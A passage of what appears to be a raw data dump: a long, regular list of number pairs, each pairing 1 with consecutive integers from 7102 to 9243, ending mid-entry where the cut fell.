(1, 7102), (1, 7103), (1, 7104), (1, 7105), (1, 7106), (1, 7107), (1, 7108), (1, 7109), (1, 7110), (1, 7111), (1, 7112), (1, 7113), (1, 7114), (1, 7115), (1, 7116), (1, 7117), (1, 7118), (1, 7119), (1, 7120), (1, 7121), (1, 7122), (1, 7123), (1, 7124), (1, 7125), (1, 7126), (1, 7127), (1, 7128), (1, 7129), (1, 7130), (1, 7131), (1, 7132), (1, 7133), (1, 7134), (1, 7135), (1, 7136), (1, 7137), (1, 7138), (1, 7139), (1, 7140), (1, 7141), (1, 7142), (1, 7143), (1, 7144), (1, 7145), (1, 7146), (1, 7147), (1, 7148), (1, 7149), (1, 7150), (1, 7151), (1, 7152), (1, 7153), (1, 7154), (1, 7155), (1, 7156), (1, 7157), (1, 7158), (1, 7159), (1, 7160), (1, 7161), (1, 7162), (1, 7163), (1, 7164), (1, 7165), (1, 7166), (1, 7167), (1, 7168), (1, 7169), (1, 7170), (1, 7171), (1, 7172), (1, 7173), (1, 7174), (1, 7175), (1, 7176), (1, 7177), (1, 7178), (1, 7179), (1, 7180), (1, 7181), (1, 7182), (1, 7183), (1, 7184), (1, 7185), (1, 7186), (1, 7187), (1, 7188), (1, 7189), (1, 7190), (1, 7191), (1, 7192), (1, 7193), (1, 7194), (1, 7195), (1, 7196), (1, 7197), (1, 7198), (1, 7199), (1, 7200), (1, 7201), (1, 7202), (1, 7203), (1, 7204), (1, 7205), (1, 7206), (1, 7207), (1, 7208), (1, 7209), (1, 7210), (1, 7211), (1, 7212), (1, 7213), (1, 7214), (1, 7215), (1, 7216), (1, 7217), (1, 7218), (1, 7219), (1, 7220), (1, 7221), (1, 7222), (1, 7223), (1, 7224), (1, 7225), (1, 7226), (1, 7227), (1, 7228), (1, 7229), (1, 7230), (1, 7231), (1, 7232), (1, 7233), (1, 7234), (1, 7235), (1, 7236), (1, 7237), (1, 7238), (1, 7239), (1, 7240), (1, 7241), (1, 7242), (1, 7243), (1, 7244), (1, 7245), (1, 7246), (1, 7247), (1, 7248), (1, 7249), (1, 7250), (1, 7251), (1, 7252), (1, 7253), (1, 7254), (1, 7255), (1, 7256), (1, 7257), (1, 7258), (1, 7259), (1, 7260), (1, 7261), (1, 7262), (1, 7263), (1, 7264), (1, 7265), (1, 7266), (1, 7267), (1, 7268), (1, 7269), (1, 7270), (1, 7271), (1, 7272), (1, 7273), (1, 7274), (1, 7275), (1, 7276), (1, 7277), (1, 7278), (1, 7279), (1, 7280), (1, 7281), (1, 7282), (1, 7283), (1, 7284), (1, 7285), (1, 7286), (1, 7287), (1, 7288), (1, 7289), (1, 7290), (1, 7291), (1, 7292), (1, 7293), (1, 7294), (1, 7295), (1, 7296), (1, 7297), (1, 7298), (1, 7299), (1, 7300), (1, 7301), (1, 7302), (1, 7303), (1, 7304), (1, 7305), (1, 7306), (1, 7307), (1, 7308), (1, 7309), (1, 7310), (1, 7311), (1, 7312), (1, 7313), (1, 7314), (1, 7315), (1, 7316), (1, 7317), (1, 7318), (1, 7319), (1, 7320), (1, 7321), (1, 7322), (1, 7323), (1, 7324), (1, 7325), (1, 7326), (1, 7327), (1, 7328), (1, 7329), (1, 7330), (1, 7331), (1, 7332), (1, 7333), (1, 7334), (1, 7335), (1, 7336), (1, 7337), (1, 7338), (1, 7339), (1, 7340), (1, 7341), (1, 7342), (1, 7343), (1, 7344), (1, 7345), (1, 7346), (1, 7347), (1, 7348), (1, 7349), (1, 7350), (1, 7351), (1, 7352), (1, 7353), (1, 7354), (1, 7355), (1, 7356), (1, 7357), (1, 7358), (1, 7359), (1, 7360), (1, 7361), (1, 7362), (1, 7363), (1, 7364), (1, 7365), (1, 7366), (1, 7367), (1, 7368), (1, 7369), (1, 7370), (1, 7371), (1, 7372), (1, 7373), (1, 7374), (1, 7375), (1, 7376), (1, 7377), (1, 7378), (1, 7379), (1, 7380), (1, 7381), (1, 7382), (1, 7383), (1, 7384), (1, 7385), (1, 7386), (1, 7387), (1, 7388), (1, 7389), (1, 7390), (1, 7391), (1, 7392), (1, 7393), (1, 7394), (1, 7395), (1, 7396), (1, 7397), (1, 7398), (1, 7399), (1, 7400), (1, 7401), (1, 7402), (1, 7403), (1, 7404), (1, 7405), (1, 7406), (1, 7407), (1, 7408), (1, 7409), (1, 7410), (1, 7411), (1, 7412), (1, 7413), (1, 7414), (1, 7415), (1, 7416), (1, 7417), (1, 7418), (1, 7419), (1, 7420), (1, 7421), (1, 7422), (1, 7423), (1, 7424), (1, 7425), (1, 7426), (1, 7427), (1, 7428), (1, 7429), (1, 7430), (1, 7431), (1, 7432), (1, 7433), (1, 7434), (1, 7435), (1, 7436), (1, 7437), (1, 7438), (1, 7439), (1, 7440), (1, 7441), (1, 7442), (1, 7443), (1, 7444), (1, 7445), (1, 7446), (1, 7447), (1, 7448), (1, 7449), (1, 7450), (1, 7451), (1, 7452), (1, 7453), (1, 7454), (1, 7455), (1, 7456), (1, 7457), (1, 7458), (1, 7459), (1, 7460), (1, 7461), (1, 7462), (1, 7463), (1, 7464), (1, 7465), (1, 7466), (1, 7467), (1, 7468), (1, 7469), (1, 7470), (1, 7471), (1, 7472), (1, 7473), (1, 7474), (1, 7475), (1, 7476), (1, 7477), (1, 7478), (1, 7479), (1, 7480), (1, 7481), (1, 7482), (1, 7483), (1, 7484), (1, 7485), (1, 7486), (1, 7487), (1, 7488), (1, 7489), (1, 7490), (1, 7491), (1, 7492), (1, 7493), (1, 7494), (1, 7495), (1, 7496), (1, 7497), (1, 7498), (1, 7499), (1, 7500), (1, 7501), (1, 7502), (1, 7503), (1, 7504), (1, 7505), (1, 7506), (1, 7507), (1, 7508), (1, 7509), (1, 7510), (1, 7511), (1, 7512), (1, 7513), (1, 7514), (1, 7515), (1, 7516), (1, 7517), (1, 7518), (1, 7519), (1, 7520), (1, 7521), (1, 7522), (1, 7523), (1, 7524), (1, 7525), (1, 7526), (1, 7527), (1, 7528), (1, 7529), (1, 7530), (1, 7531), (1, 7532), (1, 7533), (1, 7534), (1, 7535), (1, 7536), (1, 7537), (1, 7538), (1, 7539), (1, 7540), (1, 7541), (1, 7542), (1, 7543), (1, 7544), (1, 7545), (1, 7546), (1, 7547), (1, 7548), (1, 7549), (1, 7550), (1, 7551), (1, 7552), (1, 7553), (1, 7554), (1, 7555), (1, 7556), (1, 7557), (1, 7558), (1, 7559), (1, 7560), (1, 7561), (1, 7562), (1, 7563), (1, 7564), (1, 7565), (1, 7566), (1, 7567), (1, 7568), (1, 7569), (1, 7570), (1, 7571), (1, 7572), (1, 7573), (1, 7574), (1, 7575), (1, 7576), (1, 7577), (1, 7578), (1, 7579), (1, 7580), (1, 7581), (1, 7582), (1, 7583), (1, 7584), (1, 7585), (1, 7586), (1, 7587), (1, 7588), (1, 7589), (1, 7590), (1, 7591), (1, 7592), (1, 7593), (1, 7594), (1, 7595), (1, 7596), (1, 7597), (1, 7598), (1, 7599), (1, 7600), (1, 7601), (1, 7602), (1, 7603), (1, 7604), (1, 7605), (1, 7606), (1, 7607), (1, 7608), (1, 7609), (1, 7610), (1, 7611), (1, 7612), (1, 7613), (1, 7614), (1, 7615), (1, 7616), (1, 7617), (1, 7618), (1, 7619), (1, 7620), (1, 7621), (1, 7622), (1, 7623), (1, 7624), (1, 7625), (1, 7626), (1, 7627), (1, 7628), (1, 7629), (1, 7630), (1, 7631), (1, 7632), (1, 7633), (1, 7634), (1, 7635), (1, 7636), (1, 7637), (1, 7638), (1, 7639), (1, 7640), (1, 7641), (1, 7642), (1, 7643), (1, 7644), (1, 7645), (1, 7646), (1, 7647), (1, 7648), (1, 7649), (1, 7650), (1, 7651), (1, 7652), (1, 7653), (1, 7654), (1, 7655), (1, 7656), (1, 7657), (1, 7658), (1, 7659), (1, 7660), (1, 7661), (1, 7662), (1, 7663), (1, 7664), (1, 7665), (1, 7666), (1, 7667), (1, 7668), (1, 7669), (1, 7670), (1, 7671), (1, 7672), (1, 7673), (1, 7674), (1, 7675), (1, 7676), (1, 7677), (1, 7678), (1, 7679), (1, 7680), (1, 7681), (1, 7682), (1, 7683), (1, 7684), (1, 7685), (1, 7686), (1, 7687), (1, 7688), (1, 7689), (1, 7690), (1, 7691), (1, 7692), (1, 7693), (1, 7694), (1, 7695), (1, 7696), (1, 7697), (1, 7698), (1, 7699), (1, 7700), (1, 7701), (1, 7702), (1, 7703), (1, 7704), (1, 7705), (1, 7706), (1, 7707), (1, 7708), (1, 7709), (1, 7710), (1, 7711), (1, 7712), (1, 7713), (1, 7714), (1, 7715), (1, 7716), (1, 7717), (1, 7718), (1, 7719), (1, 7720), (1, 7721), (1, 7722), (1, 7723), (1, 7724), (1, 7725), (1, 7726), (1, 7727), (1, 7728), (1, 7729), (1, 7730), (1, 7731), (1, 7732), (1, 7733), (1, 7734), (1, 7735), (1, 7736), (1, 7737), (1, 7738), (1, 7739), (1, 7740), (1, 7741), (1, 7742), (1, 7743), (1, 7744), (1, 7745), (1, 7746), (1, 7747), (1, 7748), (1, 7749), (1, 7750), (1, 7751), (1, 7752), (1, 7753), (1, 7754), (1, 7755), (1, 7756), (1, 7757), (1, 7758), (1, 7759), (1, 7760), (1, 7761), (1, 7762), (1, 7763), (1, 7764), (1, 7765), (1, 7766), (1, 7767), (1, 7768), (1, 7769), (1, 7770), (1, 7771), (1, 7772), (1, 7773), (1, 7774), (1, 7775), (1, 7776), (1, 7777), (1, 7778), (1, 7779), (1, 7780), (1, 7781), (1, 7782), (1, 7783), (1, 7784), (1, 7785), (1, 7786), (1, 7787), (1, 7788), (1, 7789), (1, 7790), (1, 7791), (1, 7792), (1, 7793), (1, 7794), (1, 7795), (1, 7796), (1, 7797), (1, 7798), (1, 7799), (1, 7800), (1, 7801), (1, 7802), (1, 7803), (1, 7804), (1, 7805), (1, 7806), (1, 7807), (1, 7808), (1, 7809), (1, 7810), (1, 7811), (1, 7812), (1, 7813), (1, 7814), (1, 7815), (1, 7816), (1, 7817), (1, 7818), (1, 7819), (1, 7820), (1, 7821), (1, 7822), (1, 7823), (1, 7824), (1, 7825), (1, 7826), (1, 7827), (1, 7828), (1, 7829), (1, 7830), (1, 7831), (1, 7832), (1, 7833), (1, 7834), (1, 7835), (1, 7836), (1, 7837), (1, 7838), (1, 7839), (1, 7840), (1, 7841), (1, 7842), (1, 7843), (1, 7844), (1, 7845), (1, 7846), (1, 7847), (1, 7848), (1, 7849), (1, 7850), (1, 7851), (1, 7852), (1, 7853), (1, 7854), (1, 7855), (1, 7856), (1, 7857), (1, 7858), (1, 7859), (1, 7860), (1, 7861), (1, 7862), (1, 7863), (1, 7864), (1, 7865), (1, 7866), (1, 7867), (1, 7868), (1, 7869), (1, 7870), (1, 7871), (1, 7872), (1, 7873), (1, 7874), (1, 7875), (1, 7876), (1, 7877), (1, 7878), (1, 7879), (1, 7880), (1, 7881), (1, 7882), (1, 7883), (1, 7884), (1, 7885), (1, 7886), (1, 7887), (1, 7888), (1, 7889), (1, 7890), (1, 7891), (1, 7892), (1, 7893), (1, 7894), (1, 7895), (1, 7896), (1, 7897), (1, 7898), (1, 7899), (1, 7900), (1, 7901), (1, 7902), (1, 7903), (1, 7904), (1, 7905), (1, 7906), (1, 7907), (1, 7908), (1, 7909), (1, 7910), (1, 7911), (1, 7912), (1, 7913), (1, 7914), (1, 7915), (1, 7916), (1, 7917), (1, 7918), (1, 7919), (1, 7920), (1, 7921), (1, 7922), (1, 7923), (1, 7924), (1, 7925), (1, 7926), (1, 7927), (1, 7928), (1, 7929), (1, 7930), (1, 7931), (1, 7932), (1, 7933), (1, 7934), (1, 7935), (1, 7936), (1, 7937), (1, 7938), (1, 7939), (1, 7940), (1, 7941), (1, 7942), (1, 7943), (1, 7944), (1, 7945), (1, 7946), (1, 7947), (1, 7948), (1, 7949), (1, 7950), (1, 7951), (1, 7952), (1, 7953), (1, 7954), (1, 7955), (1, 7956), (1, 7957), (1, 7958), (1, 7959), (1, 7960), (1, 7961), (1, 7962), (1, 7963), (1, 7964), (1, 7965), (1, 7966), (1, 7967), (1, 7968), (1, 7969), (1, 7970), (1, 7971), (1, 7972), (1, 7973), (1, 7974), (1, 7975), (1, 7976), (1, 7977), (1, 7978), (1, 7979), (1, 7980), (1, 7981), (1, 7982), (1, 7983), (1, 7984), (1, 7985), (1, 7986), (1, 7987), (1, 7988), (1, 7989), (1, 7990), (1, 7991), (1, 7992), (1, 7993), (1, 7994), (1, 7995), (1, 7996), (1, 7997), (1, 7998), (1, 7999), (1, 8000), (1, 8001), (1, 8002), (1, 8003), (1, 8004), (1, 8005), (1, 8006), (1, 8007), (1, 8008), (1, 8009), (1, 8010), (1, 8011), (1, 8012), (1, 8013), (1, 8014), (1, 8015), (1, 8016), (1, 8017), (1, 8018), (1, 8019), (1, 8020), (1, 8021), (1, 8022), (1, 8023), (1, 8024), (1, 8025), (1, 8026), (1, 8027), (1, 8028), (1, 8029), (1, 8030), (1, 8031), (1, 8032), (1, 8033), (1, 8034), (1, 8035), (1, 8036), (1, 8037), (1, 8038), (1, 8039), (1, 8040), (1, 8041), (1, 8042), (1, 8043), (1, 8044), (1, 8045), (1, 8046), (1, 8047), (1, 8048), (1, 8049), (1, 8050), (1, 8051), (1, 8052), (1, 8053), (1, 8054), (1, 8055), (1, 8056), (1, 8057), (1, 8058), (1, 8059), (1, 8060), (1, 8061), (1, 8062), (1, 8063), (1, 8064), (1, 8065), (1, 8066), (1, 8067), (1, 8068), (1, 8069), (1, 8070), (1, 8071), (1, 8072), (1, 8073), (1, 8074), (1, 8075), (1, 8076), (1, 8077), (1, 8078), (1, 8079), (1, 8080), (1, 8081), (1, 8082), (1, 8083), (1, 8084), (1, 8085), (1, 8086), (1, 8087), (1, 8088), (1, 8089), (1, 8090), (1, 8091), (1, 8092), (1, 8093), (1, 8094), (1, 8095), (1, 8096), (1, 8097), (1, 8098), (1, 8099), (1, 8100), (1, 8101), (1, 8102), (1, 8103), (1, 8104), (1, 8105), (1, 8106), (1, 8107), (1, 8108), (1, 8109), (1, 8110), (1, 8111), (1, 8112), (1, 8113), (1, 8114), (1, 8115), (1, 8116), (1, 8117), (1, 8118), (1, 8119), (1, 8120), (1, 8121), (1, 8122), (1, 8123), (1, 8124), (1, 8125), (1, 8126), (1, 8127), (1, 8128), (1, 8129), (1, 8130), (1, 8131), (1, 8132), (1, 8133), (1, 8134), (1, 8135), (1, 8136), (1, 8137), (1, 8138), (1, 8139), (1, 8140), (1, 8141), (1, 8142), (1, 8143), (1, 8144), (1, 8145), (1, 8146), (1, 8147), (1, 8148), (1, 8149), (1, 8150), (1, 8151), (1, 8152), (1, 8153), (1, 8154), (1, 8155), (1, 8156), (1, 8157), (1, 8158), (1, 8159), (1, 8160), (1, 8161), (1, 8162), (1, 8163), (1, 8164), (1, 8165), (1, 8166), (1, 8167), (1, 8168), (1, 8169), (1, 8170), (1, 8171), (1, 8172), (1, 8173), (1, 8174), (1, 8175), (1, 8176), (1, 8177), (1, 8178), (1, 8179), (1, 8180), (1, 8181), (1, 8182), (1, 8183), (1, 8184), (1, 8185), (1, 8186), (1, 8187), (1, 8188), (1, 8189), (1, 8190), (1, 8191), (1, 8192), (1, 8193), (1, 8194), (1, 8195), (1, 8196), (1, 8197), (1, 8198), (1, 8199), (1, 8200), (1, 8201), (1, 8202), (1, 8203), (1, 8204), (1, 8205), (1, 8206), (1, 8207), (1, 8208), (1, 8209), (1, 8210), (1, 8211), (1, 8212), (1, 8213), (1, 8214), (1, 8215), (1, 8216), (1, 8217), (1, 8218), (1, 8219), (1, 8220), (1, 8221), (1, 8222), (1, 8223), (1, 8224), (1, 8225), (1, 8226), (1, 8227), (1, 8228), (1, 8229), (1, 8230), (1, 8231), (1, 8232), (1, 8233), (1, 8234), (1, 8235), (1, 8236), (1, 8237), (1, 8238), (1, 8239), (1, 8240), (1, 8241), (1, 8242), (1, 8243), (1, 8244), (1, 8245), (1, 8246), (1, 8247), (1, 8248), (1, 8249), (1, 8250), (1, 8251), (1, 8252), (1, 8253), (1, 8254), (1, 8255), (1, 8256), (1, 8257), (1, 8258), (1, 8259), (1, 8260), (1, 8261), (1, 8262), (1, 8263), (1, 8264), (1, 8265), (1, 8266), (1, 8267), (1, 8268), (1, 8269), (1, 8270), (1, 8271), (1, 8272), (1, 8273), (1, 8274), (1, 8275), (1, 8276), (1, 8277), (1, 8278), (1, 8279), (1, 8280), (1, 8281), (1, 8282), (1, 8283), (1, 8284), (1, 8285), (1, 8286), (1, 8287), (1, 8288), (1, 8289), (1, 8290), (1, 8291), (1, 8292), (1, 8293), (1, 8294), (1, 8295), (1, 8296), (1, 8297), (1, 8298), (1, 8299), (1, 8300), (1, 8301), (1, 8302), (1, 8303), (1, 8304), (1, 8305), (1, 8306), (1, 8307), (1, 8308), (1, 8309), (1, 8310), (1, 8311), (1, 8312), (1, 8313), (1, 8314), (1, 8315), (1, 8316), (1, 8317), (1, 8318), (1, 8319), (1, 8320), (1, 8321), (1, 8322), (1, 8323), (1, 8324), (1, 8325), (1, 8326), (1, 8327), (1, 8328), (1, 8329), (1, 8330), (1, 8331), (1, 8332), (1, 8333), (1, 8334), (1, 8335), (1, 8336), (1, 8337), (1, 8338), (1, 8339), (1, 8340), (1, 8341), (1, 8342), (1, 8343), (1, 8344), (1, 8345), (1, 8346), (1, 8347), (1, 8348), (1, 8349), (1, 8350), (1, 8351), (1, 8352), (1, 8353), (1, 8354), (1, 8355), (1, 8356), (1, 8357), (1, 8358), (1, 8359), (1, 8360), (1, 8361), (1, 8362), (1, 8363), (1, 8364), (1, 8365), (1, 8366), (1, 8367), (1, 8368), (1, 8369), (1, 8370), (1, 8371), (1, 8372), (1, 8373), (1, 8374), (1, 8375), (1, 8376), (1, 8377), (1, 8378), (1, 8379), (1, 8380), (1, 8381), (1, 8382), (1, 8383), (1, 8384), (1, 8385), (1, 8386), (1, 8387), (1, 8388), (1, 8389), (1, 8390), (1, 8391), (1, 8392), (1, 8393), (1, 8394), (1, 8395), (1, 8396), (1, 8397), (1, 8398), (1, 8399), (1, 8400), (1, 8401), (1, 8402), (1, 8403), (1, 8404), (1, 8405), (1, 8406), (1, 8407), (1, 8408), (1, 8409), (1, 8410), (1, 8411), (1, 8412), (1, 8413), (1, 8414), (1, 8415), (1, 8416), (1, 8417), (1, 8418), (1, 8419), (1, 8420), (1, 8421), (1, 8422), (1, 8423), (1, 8424), (1, 8425), (1, 8426), (1, 8427), (1, 8428), (1, 8429), (1, 8430), (1, 8431), (1, 8432), (1, 8433), (1, 8434), (1, 8435), (1, 8436), (1, 8437), (1, 8438), (1, 8439), (1, 8440), (1, 8441), (1, 8442), (1, 8443), (1, 8444), (1, 8445), (1, 8446), (1, 8447), (1, 8448), (1, 8449), (1, 8450), (1, 8451), (1, 8452), (1, 8453), (1, 8454), (1, 8455), (1, 8456), (1, 8457), (1, 8458), (1, 8459), (1, 8460), (1, 8461), (1, 8462), (1, 8463), (1, 8464), (1, 8465), (1, 8466), (1, 8467), (1, 8468), (1, 8469), (1, 8470), (1, 8471), (1, 8472), (1, 8473), (1, 8474), (1, 8475), (1, 8476), (1, 8477), (1, 8478), (1, 8479), (1, 8480), (1, 8481), (1, 8482), (1, 8483), (1, 8484), (1, 8485), (1, 8486), (1, 8487), (1, 8488), (1, 8489), (1, 8490), (1, 8491), (1, 8492), (1, 8493), (1, 8494), (1, 8495), (1, 8496), (1, 8497), (1, 8498), (1, 8499), (1, 8500), (1, 8501), (1, 8502), (1, 8503), (1, 8504), (1, 8505), (1, 8506), (1, 8507), (1, 8508), (1, 8509), (1, 8510), (1, 8511), (1, 8512), (1, 8513), (1, 8514), (1, 8515), (1, 8516), (1, 8517), (1, 8518), (1, 8519), (1, 8520), (1, 8521), (1, 8522), (1, 8523), (1, 8524), (1, 8525), (1, 8526), (1, 8527), (1, 8528), (1, 8529), (1, 8530), (1, 8531), (1, 8532), (1, 8533), (1, 8534), (1, 8535), (1, 8536), (1, 8537), (1, 8538), (1, 8539), (1, 8540), (1, 8541), (1, 8542), (1, 8543), (1, 8544), (1, 8545), (1, 8546), (1, 8547), (1, 8548), (1, 8549), (1, 8550), (1, 8551), (1, 8552), (1, 8553), (1, 8554), (1, 8555), (1, 8556), (1, 8557), (1, 8558), (1, 8559), (1, 8560), (1, 8561), (1, 8562), (1, 8563), (1, 8564), (1, 8565), (1, 8566), (1, 8567), (1, 8568), (1, 8569), (1, 8570), (1, 8571), (1, 8572), (1, 8573), (1, 8574), (1, 8575), (1, 8576), (1, 8577), (1, 8578), (1, 8579), (1, 8580), (1, 8581), (1, 8582), (1, 8583), (1, 8584), (1, 8585), (1, 8586), (1, 8587), (1, 8588), (1, 8589), (1, 8590), (1, 8591), (1, 8592), (1, 8593), (1, 8594), (1, 8595), (1, 8596), (1, 8597), (1, 8598), (1, 8599), (1, 8600), (1, 8601), (1, 8602), (1, 8603), (1, 8604), (1, 8605), (1, 8606), (1, 8607), (1, 8608), (1, 8609), (1, 8610), (1, 8611), (1, 8612), (1, 8613), (1, 8614), (1, 8615), (1, 8616), (1, 8617), (1, 8618), (1, 8619), (1, 8620), (1, 8621), (1, 8622), (1, 8623), (1, 8624), (1, 8625), (1, 8626), (1, 8627), (1, 8628), (1, 8629), (1, 8630), (1, 8631), (1, 8632), (1, 8633), (1, 8634), (1, 8635), (1, 8636), (1, 8637), (1, 8638), (1, 8639), (1, 8640), (1, 8641), (1, 8642), (1, 8643), (1, 8644), (1, 8645), (1, 8646), (1, 8647), (1, 8648), (1, 8649), (1, 8650), (1, 8651), (1, 8652), (1, 8653), (1, 8654), (1, 8655), (1, 8656), (1, 8657), (1, 8658), (1, 8659), (1, 8660), (1, 8661), (1, 8662), (1, 8663), (1, 8664), (1, 8665), (1, 8666), (1, 8667), (1, 8668), (1, 8669), (1, 8670), (1, 8671), (1, 8672), (1, 8673), (1, 8674), (1, 8675), (1, 8676), (1, 8677), (1, 8678), (1, 8679), (1, 8680), (1, 8681), (1, 8682), (1, 8683), (1, 8684), (1, 8685), (1, 8686), (1, 8687), (1, 8688), (1, 8689), (1, 8690), (1, 8691), (1, 8692), (1, 8693), (1, 8694), (1, 8695), (1, 8696), (1, 8697), (1, 8698), (1, 8699), (1, 8700), (1, 8701), (1, 8702), (1, 8703), (1, 8704), (1, 8705), (1, 8706), (1, 8707), (1, 8708), (1, 8709), (1, 8710), (1, 8711), (1, 8712), (1, 8713), (1, 8714), (1, 8715), (1, 8716), (1, 8717), (1, 8718), (1, 8719), (1, 8720), (1, 8721), (1, 8722), (1, 8723), (1, 8724), (1, 8725), (1, 8726), (1, 8727), (1, 8728), (1, 8729), (1, 8730), (1, 8731), (1, 8732), (1, 8733), (1, 8734), (1, 8735), (1, 8736), (1, 8737), (1, 8738), (1, 8739), (1, 8740), (1, 8741), (1, 8742), (1, 8743), (1, 8744), (1, 8745), (1, 8746), (1, 8747), (1, 8748), (1, 8749), (1, 8750), (1, 8751), (1, 8752), (1, 8753), (1, 8754), (1, 8755), (1, 8756), (1, 8757), (1, 8758), (1, 8759), (1, 8760), (1, 8761), (1, 8762), (1, 8763), (1, 8764), (1, 8765), (1, 8766), (1, 8767), (1, 8768), (1, 8769), (1, 8770), (1, 8771), (1, 8772), (1, 8773), (1, 8774), (1, 8775), (1, 8776), (1, 8777), (1, 8778), (1, 8779), (1, 8780), (1, 8781), (1, 8782), (1, 8783), (1, 8784), (1, 8785), (1, 8786), (1, 8787), (1, 8788), (1, 8789), (1, 8790), (1, 8791), (1, 8792), (1, 8793), (1, 8794), (1, 8795), (1, 8796), (1, 8797), (1, 8798), (1, 8799), (1, 8800), (1, 8801), (1, 8802), (1, 8803), (1, 8804), (1, 8805), (1, 8806), (1, 8807), (1, 8808), (1, 8809), (1, 8810), (1, 8811), (1, 8812), (1, 8813), (1, 8814), (1, 8815), (1, 8816), (1, 8817), (1, 8818), (1, 8819), (1, 8820), (1, 8821), (1, 8822), (1, 8823), (1, 8824), (1, 8825), (1, 8826), (1, 8827), (1, 8828), (1, 8829), (1, 8830), (1, 8831), (1, 8832), (1, 8833), (1, 8834), (1, 8835), (1, 8836), (1, 8837), (1, 8838), (1, 8839), (1, 8840), (1, 8841), (1, 8842), (1, 8843), (1, 8844), (1, 8845), (1, 8846), (1, 8847), (1, 8848), (1, 8849), (1, 8850), (1, 8851), (1, 8852), (1, 8853), (1, 8854), (1, 8855), (1, 8856), (1, 8857), (1, 8858), (1, 8859), (1, 8860), (1, 8861), (1, 8862), (1, 8863), (1, 8864), (1, 8865), (1, 8866), (1, 8867), (1, 8868), (1, 8869), (1, 8870), (1, 8871), (1, 8872), (1, 8873), (1, 8874), (1, 8875), (1, 8876), (1, 8877), (1, 8878), (1, 8879), (1, 8880), (1, 8881), (1, 8882), (1, 8883), (1, 8884), (1, 8885), (1, 8886), (1, 8887), (1, 8888), (1, 8889), (1, 8890), (1, 8891), (1, 8892), (1, 8893), (1, 8894), (1, 8895), (1, 8896), (1, 8897), (1, 8898), (1, 8899), (1, 8900), (1, 8901), (1, 8902), (1, 8903), (1, 8904), (1, 8905), (1, 8906), (1, 8907), (1, 8908), (1, 8909), (1, 8910), (1, 8911), (1, 8912), (1, 8913), (1, 8914), (1, 8915), (1, 8916), (1, 8917), (1, 8918), (1, 8919), (1, 8920), (1, 8921), (1, 8922), (1, 8923), (1, 8924), (1, 8925), (1, 8926), (1, 8927), (1, 8928), (1, 8929), (1, 8930), (1, 8931), (1, 8932), (1, 8933), (1, 8934), (1, 8935), (1, 8936), (1, 8937), (1, 8938), (1, 8939), (1, 8940), (1, 8941), (1, 8942), (1, 8943), (1, 8944), (1, 8945), (1, 8946), (1, 8947), (1, 8948), (1, 8949), (1, 8950), (1, 8951), (1, 8952), (1, 8953), (1, 8954), (1, 8955), (1, 8956), (1, 8957), (1, 8958), (1, 8959), (1, 8960), (1, 8961), (1, 8962), (1, 8963), (1, 8964), (1, 8965), (1, 8966), (1, 8967), (1, 8968), (1, 8969), (1, 8970), (1, 8971), (1, 8972), (1, 8973), (1, 8974), (1, 8975), (1, 8976), (1, 8977), (1, 8978), (1, 8979), (1, 8980), (1, 8981), (1, 8982), (1, 8983), (1, 8984), (1, 8985), (1, 8986), (1, 8987), (1, 8988), (1, 8989), (1, 8990), (1, 8991), (1, 8992), (1, 8993), (1, 8994), (1, 8995), (1, 8996), (1, 8997), (1, 8998), (1, 8999), (1, 9000), (1, 9001), (1, 9002), (1, 9003), (1, 9004), (1, 9005), (1, 9006), (1, 9007), (1, 9008), (1, 9009), (1, 9010), (1, 9011), (1, 9012), (1, 9013), (1, 9014), (1, 9015), (1, 9016), (1, 9017), (1, 9018), (1, 9019), (1, 9020), (1, 9021), (1, 9022), (1, 9023), (1, 9024), (1, 9025), (1, 9026), (1, 9027), (1, 9028), (1, 9029), (1, 9030), (1, 9031), (1, 9032), (1, 9033), (1, 9034), (1, 9035), (1, 9036), (1, 9037), (1, 9038), (1, 9039), (1, 9040), (1, 9041), (1, 9042), (1, 9043), (1, 9044), (1, 9045), (1, 9046), (1, 9047), (1, 9048), (1, 9049), (1, 9050), (1, 9051), (1, 9052), (1, 9053), (1, 9054), (1, 9055), (1, 9056), (1, 9057), (1, 9058), (1, 9059), (1, 9060), (1, 9061), (1, 9062), (1, 9063), (1, 9064), (1, 9065), (1, 9066), (1, 9067), (1, 9068), (1, 9069), (1, 9070), (1, 9071), (1, 9072), (1, 9073), (1, 9074), (1, 9075), (1, 9076), (1, 9077), (1, 9078), (1, 9079), (1, 9080), (1, 9081), (1, 9082), (1, 9083), (1, 9084), (1, 9085), (1, 9086), (1, 9087), (1, 9088), (1, 9089), (1, 9090), (1, 9091), (1, 9092), (1, 9093), (1, 9094), (1, 9095), (1, 9096), (1, 9097), (1, 9098), (1, 9099), (1, 9100), (1, 9101), (1, 9102), (1, 9103), (1, 9104), (1, 9105), (1, 9106), (1, 9107), (1, 9108), (1, 9109), (1, 9110), (1, 9111), (1, 9112), (1, 9113), (1, 9114), (1, 9115), (1, 9116), (1, 9117), (1, 9118), (1, 9119), (1, 9120), (1, 9121), (1, 9122), (1, 9123), (1, 9124), (1, 9125), (1, 9126), (1, 9127), (1, 9128), (1, 9129), (1, 9130), (1, 9131), (1, 9132), (1, 9133), (1, 9134), (1, 9135), (1, 9136), (1, 9137), (1, 9138), (1, 9139), (1, 9140), (1, 9141), (1, 9142), (1, 9143), (1, 9144), (1, 9145), (1, 9146), (1, 9147), (1, 9148), (1, 9149), (1, 9150), (1, 9151), (1, 9152), (1, 9153), (1, 9154), (1, 9155), (1, 9156), (1, 9157), (1, 9158), (1, 9159), (1, 9160), (1, 9161), (1, 9162), (1, 9163), (1, 9164), (1, 9165), (1, 9166), (1, 9167), (1, 9168), (1, 9169), (1, 9170), (1, 9171), (1, 9172), (1, 9173), (1, 9174), (1, 9175), (1, 9176), (1, 9177), (1, 9178), (1, 9179), (1, 9180), (1, 9181), (1, 9182), (1, 9183), (1, 9184), (1, 9185), (1, 9186), (1, 9187), (1, 9188), (1, 9189), (1, 9190), (1, 9191), (1, 9192), (1, 9193), (1, 9194), (1, 9195), (1, 9196), (1, 9197), (1, 9198), (1, 9199), (1, 9200), (1, 9201), (1, 9202), (1, 9203), (1, 9204), (1, 9205), (1, 9206), (1, 9207), (1, 9208), (1, 9209), (1, 9210), (1, 9211), (1, 9212), (1, 9213), (1, 9214), (1, 9215), (1, 9216), (1, 9217), (1, 9218), (1, 9219), (1, 9220), (1, 9221), (1, 9222), (1, 9223), (1, 9224), (1, 9225), (1, 9226), (1, 9227), (1, 9228), (1, 9229), (1, 9230), (1, 9231), (1, 9232), (1, 9233), (1, 9234), (1, 9235), (1, 9236), (1, 9237), (1, 9238), (1, 9239), (1, 9240), (1, 9241), (1, 9242), (1, 9243), (1, 